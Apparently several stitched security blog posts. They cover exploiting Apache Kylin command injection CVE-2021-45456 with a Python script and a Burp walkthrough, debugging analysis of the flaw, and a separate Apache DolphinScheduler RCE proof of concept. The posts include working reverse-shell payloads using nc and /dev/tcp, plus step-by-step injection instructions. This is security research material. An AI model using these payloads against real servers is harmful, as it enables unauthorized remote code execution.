Introduction

This is an exploitation script written in Python to exploit #Apache #Kylin Command Injection #CVE-2021-45456 and get RCE.

You can find the script here: https://github.com/mhzcyber/CVE-Analysis/blob/main/CVE-2021-45456/CVE-2021-45456Exploit.py

To understand more about the CVE, you can check the previous PoC and Analysis blog that we published.

• https://www.vicarius.io/vsociety/blog/cve-2021-45456-apache-kylin-rce-poc

• https://www.vicarius.io/vsociety/blog/cve-2021-45456-apache-kylin-command-injection

Testing Lab

The lab here is the same as the one mentioned in the analysis blog, but we will add a minor modification.

Since this is a docker container, it’s minimalized with the requirements only to run the solution.

Usually, we have more features to abuse in the system, for example, netcat or nc, so we are going to install nc.

• Access the container using the following command:

sudo docker exec -it container_id bash

• Install nc

yum install nc -y

Exploitation Script

We are going to start by explaining the script

• The script starts with defining the libraries

create_project function

• After that, we have the create_project function, where we create a project and inject the malicious payload.

The function takes the following args host, lhost, lport, username, password

Those args are entered by the user when running the script.

This line checks if there is “.” in the lhost and removes them.

so if the lhost is 172.17.0.2 the result is 1721702

if "." in lhost:
        lhost = lhost.replace(".", "")

structuring the URL

url = f"http://{host}/kylin/api/projects"

takes the username and password and encodes them with base64 to create basic auth.

auth_header = f"Basic {base64.b64encode(f'{username}:{password}'.encode('ascii')).decode('ascii')}"

Structuring the headers, and the project data which includes the name, description ..etc, we have also the project_desc_data with is the project data but in a JSON format

Proxy setting to be able to intercept the requests from the script

Send the HTTP request, and check for the error message if the project already existed.

If the HTTP code is 200 which means the request success

It will retrieve the jsessionid

If there’s some other error it will be printed and it will return none

trigger_diagnosis function

The function takes those args host, jsessionid, lhost, lport

all entered by the user except jessionid returned from create_project function.

Structuring the project_name i.e. the malicious payload, the URL to trigger the exploitation, and the headers.

Proxy setting to be able to intercept the requests from the script

Send the request, if it’s 200 OK, it will print “[+] Request is successful.”

otherwise, it will print the error code.

Here’s a banner with usage instructions and example.

Unless there are 5 args entered, the tool will exit.

The returned value of jsessionid from create_project function is stored in the variable jsessionid

it checks if jsessionid variable is not none and has the value false, it runs the trigger_diagnosis function. otherwise, it will quit.

Run the exploitation script

I’m going to run the exploit and use the proxy to intercept the requests in burpsuite demonstrating better understanding.

• This is the create_project function request

• This is the trigger_diagnosis function request

• Received a connection and gained access

Video of the exploitation tool from here:

https://youtu.be/gg8Qrs-zo_E

Introduction

Background Story

Build the lab

Install docker

• apt update
• apt install docker docker-compose

Install Apache Kylin

• docker pull apachekylin/apache-kylin-standalone:4.0.0  

• sudo docker run -d \ -m 8G \ -p 7070:7070 \ -p 8088:8088 \ -p 50070:50070 \ -p 8032:8032 \ -p 8042:8042 \ -p 2181:2181 \ -p 1337:1337 \ --name kylin-4.0.0 \ apachekylin/apache-kylin-standalone:4.0.0

Setup the debugger

• docker exec -it container_id bash
• file path /home/admin/apache-kylin-4.0.0-bin-spark2/bin/kylin.sh
• Under the retrieveStartCommand() function which is the start command function. line number 267

• Scroll down to line number 307, the line starts with the following $JAVA ${KYLIN_EXTRA_START_OPTS} ${KYLIN_TOMCAT_OPTS}
• Add the following -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=1337

• Restart the container docker container restart container_id
• Login to Kylin, port is 7070. I’m using the docker ip, you can also use the localhost IP.
• Creds admin:KYLIN

• Configure the debugger in Intellij IDEA

Reproduce the vulnerability

• Once you click “Diagnosis”, intercept the request

• Change the name touchpawned to %60touch%20pawned%60 which the URL-encoded result of the following:

  `touch pawned`

• Now, check the container

Static Analysis & Debugging

Find an entry point

• I searched for “projects” and found the “ProjectController.java”. This class here responsible for listing all projects, saving the project, updating the project, deleting the project, updating the project owner, and basically most of the project functions.
• I set a few breakpoints as you can see and I created a new project called “test1”, you can see this in projectDescData variable the values of the project.

Understand how the project gets created and saved

• So first time we create a project, the solution will use the saveProject method. Let’s go through this method real quick.

• @RequestMapping(value = "", method = { RequestMethod.POST }, produces = { "application/json" }): This line is an annotation that maps the method to the endpoint for creating a new project instance. It specifies that the endpoint should accept a POST request with an empty URL and that it should produce a JSON response.

• @ResponseBody: This annotation is used to indicate that the method’s return value should be written directly to the response body.

• public ProjectInstance saveProject(@RequestBody ProjectRequest projectRequest): This line defines the method signature, which includes a ProjectRequest object as the request body and returns a ProjectInstance object.

• if (StringUtils.isEmpty(projectDesc.getName())): This line checks whether the name field of the ProjectInstance object is empty.

• if (!ValidateUtil.isAlphanumericUnderscore(projectDesc.getName())): This line checks whether the name field of the ProjectInstance object contains only alphanumeric characters and underscores.throw new BadRequestException(: If the name field does not contain only alphanumeric characters and underscores, a BadRequestException is thrown.

ProjectInstance createdProj = null;
        try {
            createdProj = projectService.createProject(projectDesc);
        } catch (Exception e) {
            throw new InternalErrorException(e.getLocalizedMessage(), e);
        }

• return createdProj;: This line returns the createdProj object, which contains the newly created project instance

How the diagnosis request get proceeded & how the command gets executed

• It all starts from the dumpProjectDiagnosisInfo method, set the breakpoints.  

• Now click on “Diagnosis” in the website. you can always see variables and their values right there.  

• The important line for me is the following String filePath = dgService.dumpProjectDiagnosisInfo(project, diagDir.getFile());

• We have here the dumpProjectDiagnosisInfo , now follow this and you will find yourself in DiagnosisService.java file

• Keep following with the debugger, now this is another interesting

• After that we see runDiagnosisCLI(args) takes the args array as input.
• Step-in, and here is the runDiagnosisCLI() method, and we can see the args with the values right there.  

• Now, we have diagCmd variable which has the script path and the args.

• Step-in, and click getCliCommandExecutor()

• This will take you to getCliCommandExecutor and this method determines if it will get the remote access configuration of a Hadoop cluster or not to execute commands on it, i.e. remote commands. if the value retrieved is null in regards to the remote access configuration of the Hadoop cluster, and this is what happened in our case, the commands will be executed locally.

• You can see the value of executor returned

How the execution looks like with an injected malicious payload

The root cause

ProjectManager.getInstance(KylinConfig.getInstanceFromEnv())

Patch Diffing

Mitigation

Final Thoughts

Resources:

• https://securitylab.github.com/advisories/GHSL-2021-1048_GHSL-2021-1051_Apache_Kylin/
• https://github.com/apache/kylin/commit/f4daf14dde99b934c92ce2c832509f24342bc845#diff-5ca0e5634941e5810bc535c8084b3f11f9dce8cbb513500ec22db6a3a69ec930L97
• https://kylin.apache.org/docs/install/index.html
• https://github.com/apache/kylin

Introduction

Command injection in #Apache Kylin has been found and registered as #CVE-2021-45456, in vsociety we managed to leverage it to RCE and create PoC.

Analysis for this CVE is coming soon, so stay tuned to understand more in-depth about how this vulnerability works.

Proof of concept

• Add a project

• No characters are allowed except _ , therefore the name of the project is based on the payload but stripped from characters as follows:

  
  my payload is nc -c sh 172.17.0.1 9001 so the project name is nccsh17217019001

  
  

  

  
  

  

  
  

• Go to “System”

• Turn proxy on

• Click “Diagnosis” and intercept the request

  
  

  

• Send it to the repeater and drop this request
  

  

• The payload after encoding %60nc%20%2dc%20sh%20172%2e17%2e0%2e1%209001%60

  
  The decoded payload
  

  `nc -c sh 172.17.0.1 9001`

  
  

  

• Replace the project name with the encoded payload

  
  

  

• Run the listener and send the request

  
  

  

  
  

  

NOTES

1. Adding any / encoded or not in the payload will not work. Check the analysis on vsociety for more information.

2. You need permission to create a project, so the name of the project can be based on the payload.

3. The exploitation will not succeed if the project name is modified by adding any additional letter to the payload in the request.

4. The ip and port should be part of the name, the IP without . and you add the dots . later as URL encoded.

Introduction

Remote Code Execution PoC

• Supposing you already found an alarm you can edit or create a new one.
• Add the following payload '; echo "sh -i >& /dev/tcp/172.17.0.1/9001 0>&1"|bash;# to the “User Params”
• Run your listener
• There are two ways to lunch the exploit now
  • Go to “Projects>Click on the project name>Worflow Definition>Start” This is already mentioned in the analysis blog.
  • Go to “Projects>Click on the project name>Worflow instance>Rerun”  

NOTES

1. Usually, when you access Apache DolphinScheduler you will find tenants, alarms, and project, workflows are ready.
2. You need to make sure that you have the permissions to edit the alarm so you can add your payload, and at least run workflow so you can decide which alarm group will run for notification. if you can run a workflow and choose the alarm group that includes the malicious one, you will be able to exploit it.
3. You need a script that exists in the server already, so when the alarm gets triggered it will trigger the payload as well because there are multiple checks and one of them check if the script file exists or not. for more information about this check the analysis blog.